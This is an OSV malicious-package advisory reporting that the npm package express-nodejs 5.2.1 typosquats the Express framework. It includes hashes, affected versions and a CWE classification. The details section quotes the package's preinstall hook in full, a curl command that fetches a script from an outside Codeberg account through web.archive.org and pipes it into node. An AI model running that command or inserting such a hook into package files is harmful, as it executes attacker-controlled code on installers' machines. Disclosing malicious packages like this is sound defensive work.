MAL-2026-17243

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-nodejs/MAL-2026-17243.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17243
Published
2026-09-29T14:40:14Z
Modified
2026-09-29T15:00:05Z
Summary
Malicious code in express-nodejs (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (9aea7dd76028cd443cf2f8d58fa5d8b3b28bb6db870f34d1cc6dad28db92fe93)

express-nodejs@5.2.1 typosquats the express framework: package.json copies express's description, author (TJ Holowaychuk), repository (expressjs/express), and homepage while publishing under a different name. The package.json preinstall lifecycle hook runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, piping a script fetched from an unrelated third-party Codeberg account (hellscripter/install-scripts) on a mutable branch, laundered through web.archive.org, directly into the node interpreter on the installer's host. This executes arbitrary attacker-controlled code at npm install time with no pinning, no integrity check, and no relationship to the express project. The fetched payload is mutable and its contents are not shipped in the tarball.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020631",
            "import_time":  "2026-09-29T14:44:37.348435315Z",
            "modified_time":  "2026-09-29T14:40:14Z",
            "sha256":  "9aea7dd76028cd443cf2f8d58fa5d8b3b28bb6db870f34d1cc6dad28db92fe93",
            "source":  "amazon-inspector",
            "versions":  [
                "5.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / express-nodejs

Package

Name
express-nodejs
View open source insights on deps.dev
Purl
pkg:npm/express-nodejs

Affected ranges

Affected versions

5.*
5.2.1

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "afa88132b139c981315a84389978151c8d9ab5bd2055a33783ed9d5b028ed6e0",
            "tlsh":  "ef51da21cc0e8c6326c5a6dd3c68a542616188078e41f81cf769539c8f8e52f71b9fbf"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "express-nodejs-5.2.1.tgz",
            "hashes":  {
                "sha1":  "899321111bfd44358cc22ce991d32cb101203dff",
                "sha512_sri":  "sha512-919mTtdAxNkaV9vMheghnKi4nL/XSrbfsO5G3Ago43rzz7ct24hPzC/pWZVpBkQA4ogAbWPsxTyKeWYiIuwUGQ=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-nodejs/MAL-2026-17243.json"